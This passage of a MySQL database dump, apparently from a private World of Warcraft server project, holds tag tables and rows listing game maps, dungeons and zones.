`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9107, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9108, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9109, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9110, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9111, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9112, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9113, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9114, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9115, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9116, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9117, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9118, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9121, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9122, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9123, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9124, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9125, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9126, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9127, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9128, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9129, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9131, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9132, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9136, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9137, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9141, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9142, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9208, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9208, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9209, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9209, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9210, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9210, 4, 2, 1977, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9211, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9213, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9221, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9222, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9223, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9224, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9225, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9226, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9227, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9228, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9229, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9230, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9232, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9234, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9235, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9236, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9237, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9238, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9239, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9240, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9241, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9242, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9243, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9244, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9245, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9246, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9248, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9251, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9257, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9259, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9266, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9267, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9268, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9269, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9270, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9271, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9272, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9338, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9339, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9362, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9364, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9365, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9367, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9368, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9388, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9389, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9415, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9416, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9419, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9422, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9664, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9665, 4, 1, 0, ' generated'); /*!40000 ALTER TABLE `mojotrollz_tags` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_tags_type CREATE TABLE IF NOT EXISTS `mojotrollz_tags_type` ( `id` int(10) NOT NULL, `table` int(10) NOT NULL, `name` tinytext NOT NULL, `description` tinytext, PRIMARY KEY (`id`,`table`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_tags_type: ~25 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_tags_type` DISABLE KEYS */; INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (1, 1, 'Map', 'Map of the Creature'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (1, 2, 'Map', 'Map of the Object'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (1, 4, 'Map', 'Map of the Quest'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (2, 1, 'Zone', 'Zone of the Creature within a Map'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (2, 2, 'Zone', 'Zone of the Objekt'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (2, 4, 'Zone', 'Zone of the Quest'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (4, 1, 'MojoDeploy', 'Mojo Deployed Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (4, 2, 'MojoDeploy', 'Mojo Deployed Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (4, 3, 'MojoDeploy', 'Mojo Deployed Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (4, 4, 'MojoDeploy', 'Mojo Deployed Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (10, 1, 'Mojo', 'Mojo Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (10, 2, 'Mojo', 'Mojo Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (10, 3, 'Mojo', 'Mojo Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (10, 4, 'Mojo', 'Mojo Content'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (12, 7, 'FAQ', 'FAQ'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (13, 7, 'OFFICIAL', ''); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (14, 7, 'FULL POST', ''); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (15, 7, 'COMMENT', ''); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (20, 3, 'Item ClassSpec', 'Player class and spec for which the item was designed'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (21, 3, 'Item Type', 'Type of the Item e.g Startitem'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (30, 1, 'Rank', 'Elite Status of a Creature'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (31, 1, 'Bug', 'Common Bug description'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (32, 1, 'Purpose', 'Purpose of a Creature'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (33, 1, 'Purpose Specific', 'Specific Purpose of the Creature'); INSERT INTO `mojotrollz_tags_type` (`id`, `table`, `name`, `description`) VALUES (35, 1, 'Vendor', 'Creature Vendor Functionality'); /*!40000 ALTER TABLE `mojotrollz_tags_type` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_tags_value CREATE TABLE IF NOT EXISTS `mojotrollz_tags_value` ( `id` int(10) NOT NULL DEFAULT '0', `type` int(10) NOT NULL DEFAULT '0', `value` tinytext NOT NULL, `description` tinytext, PRIMARY KEY (`type`,`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_tags_value: ~1.167 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_tags_value` DISABLE KEYS */; INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (0, 1, 'Eastern Kingdoms', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 1, 'Kalimdor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (30, 1, 'Alterac Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (33, 1, 'Shadowfang Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (34, 1, 'The Stockade', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (35, 1, 'Stormwind Vault', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (36, 1, 'The Deadmines', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (43, 1, 'Wailing Caverns', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (47, 1, 'Razorfen Kraul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (48, 1, 'Blackfathom Deeps', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (69, 1, 'Emerald Dream', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (70, 1, 'Uldaman', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (90, 1, 'Gnomeregan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (109, 1, 'The Temple of Atal\'Hakkar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (129, 1, 'Razorfen Downs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (189, 1, 'Scarlet Monastery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (209, 1, 'Zul\'Farrak', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (229, 1, 'Blackrock Spire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (230, 1, 'Blackrock Depths', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (249, 1, 'Onyxia\'s Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (289, 1, 'Scholomance', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (309, 1, 'Zul\'Gurub', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (329, 1, 'Stratholme', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (349, 1, 'Maraudon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (369, 1, 'Deeprun Tram', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (389, 1, 'Ragefire Chasm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (409, 1, 'Molten Core', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (429, 1, 'Dire Maul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (449, 1, 'Alliance PVP Barracks', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (450, 1, 'Horde PVP Barracks', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (469, 1, 'Blackwing Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (489, 1, 'Warsong Gulch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (509, 1, 'Ruins of Ahn\'Qiraj', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (529, 1, 'Arathi Basin', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (531, 1, 'Temple of Ahn\'Qiraj', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (533, 1, 'Naxxramas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 2, 'Dun Morogh', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 2, 'Longshore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 2, 'Badlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 2, 'Blasted Lands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (7, 2, 'Blackwater Cove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (8, 2, 'Swamp of Sorrows', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (9, 2, 'Northshire Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (10, 2, 'Duskwood', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (11, 2, 'Wetlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (12, 2, 'Elwynn Forest ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (13, 2, 'The World Tree', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (14, 2, 'Durotar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (15, 2, 'Dustwallow Marsh', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (16, 2, 'Azshara', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (17, 2, 'The Barrens', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (18, 2, 'Crystal Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (19, 2, 'Zul\'Gurub', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (20, 2, 'Moonbrook', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (21, 2, 'Kul Tiras', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (22, 2, 'Programmer Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (23, 2, 'Northshire River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (24, 2, 'Northshire Abbey', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (25, 2, 'Blackrock Mountain', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (26, 2, 'Lighthouse', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (28, 2, 'Western Plaguelands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (30, 2, 'Nine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (32, 2, 'The Cemetary', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (33, 2, 'Stranglethorn Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (34, 2, 'Echo Ridge Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (35, 2, 'Booty Bay', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (36, 2, 'Alterac Mountains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (37, 2, 'Lake Nazferiti', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (38, 2, 'Loch Modan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (40, 2, 'Westfall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (41, 2, 'Deadwind Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (42, 2, 'Darkshire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (43, 2, 'Wild Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (44, 2, 'Redridge Mountains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (45, 2, 'Arathi Highlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (46, 2, 'Burning Steppes', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (47, 2, 'The Hinterlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (49, 2, 'Dead Man\'s Hole', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (51, 2, 'Searing Gorge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (53, 2, 'Thieves Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (54, 2, 'Jasperlode Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (55, 2, 'Valley of Heroes', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (56, 2, 'Heroes\' Vigil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (57, 2, 'Fargodeep Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (59, 2, 'Northshire Vineyards', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (60, 2, 'Forest\'s Edge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (61, 2, 'Thunder Falls', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (62, 2, 'Brackwell Pumpkin Patch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (63, 2, 'The Stonefield Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (64, 2, 'The Maclure Vineyards', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (68, 2, 'Lake Everstill ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (69, 2, 'Lakeshire ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (70, 2, 'Stonewatch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (71, 2, 'Stonewatch Falls', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (72, 2, 'The Dark Portal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (73, 2, 'The Tainted Scar ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (74, 2, 'Pool of Tears', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (75, 2, 'Stonard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (76, 2, 'Fallow Sanctuary', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (77, 2, 'Anvilmar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (80, 2, 'Stormwind Mountains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (85, 2, 'Tirisfal Glades', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (86, 2, 'Stone Cairn Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (87, 2, 'Goldshire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (88, 2, 'Eastvale Logging Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (89, 2, 'Mirror Lake Orchard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (91, 2, 'Tower of Azora', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (92, 2, 'Mirror Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (93, 2, 'Vul\'Gol Ogre Mound ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (94, 2, 'Raven Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (95, 2, 'Redridge Canyons', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (96, 2, 'Tower of Ilgalar ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (97, 2, 'Alther\'s Mill ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (98, 2, 'Rethban Caverns', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (99, 2, 'Rebel Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (100, 2, 'Nesingwary\'s Expedition', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (101, 2, 'Kurzen\'s Compound', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (102, 2, 'Ruins of Zul\'Kunda', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (103, 2, 'Ruins of Zul\'Mamwe', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (104, 2, 'The Vile Reef', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (105, 2, 'Mosh\'Ogg Ogre Mound', ''); INSERT INTO 